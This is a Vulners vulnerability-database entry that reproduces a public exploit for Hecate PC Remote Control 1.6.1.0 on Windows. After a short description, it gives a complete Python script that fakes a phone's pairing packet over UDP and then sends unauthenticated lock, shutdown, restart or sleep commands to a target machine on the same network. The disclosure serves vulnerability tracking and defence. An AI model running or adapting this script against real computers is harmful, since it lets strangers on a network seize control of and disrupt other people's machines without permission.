Vulners
Lucene search
📄 Hecate PC Remote Control 1.6.1.0 Remote System Control
# Exploit Title: Hecate - PC Remote Control 1.6.1.0 - Unauthenticated
Remote System Control
# Date: 29/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://risefall.org
# Software Link:
https://apps.microsoft.com/detail/9mxqtf885mjp?hl=en-US&gl=US
# Version: 1.6.1.0
# Tested on: Windows 10
'''
Description:
Hecate - PC Remote Control 1.6.1.0 is vulnerable to unauthenticated system
control. An attacker on the same network can send crafted UDP packets to
the target without authentication,
allowing them to remotely issue system-level commands such as lock,
shutdown, restart, and sleep.
'''
import socket
import json
import uuid
import time
from datetime import datetime
import argparse
import sys
LHOST = "192.168.8.100"
TARGET_IP = "192.168.8.105"
PORT = 48436
PHONE_ID = str(uuid.uuid4()).upper()
VALID_COMMANDS = {
"lock": "lockPc",
"shutdown": "shutdownPc",
"restart": "restartPc",
"sleep": "sleepPc"
}
def send_packet(packet):
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.sendto(json.dumps(packet).encode(), (TARGET_IP, PORT))
print(f"[Sent] {packet['command']}")
def init_connection():
send_packet({
"command": "init",
"phoneId": PHONE_ID,
"data": {
"id": PHONE_ID,
"brand": "ExploitDevice",
"model": "Exploit",
"platform": "Android",
"ip": LHOST,
"port": PORT,
"connectedAt": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
}
})
def send_control_command(action):
command = VALID_COMMANDS.get(action)
if not command:
print(f"[-] Invalid action: {action}")
sys.exit(1)
send_packet({
"command": command,
"phoneId": PHONE_ID,
"data": None
})
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Hecate - Send unauthenticated control commands (lock,
shutdown, restart, sleep)"
)
parser.add_argument(
"--action",
choices=VALID_COMMANDS.keys(),
required=True,
help="Action to perform on the target: lock, shutdown, restart,
sleep"
)
args = parser.parse_args()
print("[*] Initializing connection...")
init_connection()
time.sleep(2)
print(f"[*] Sending '{args.action}' command...")
send_control_command(args.action)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jun 2025 00:00Current
7.7High risk
Vulners AI Score7.7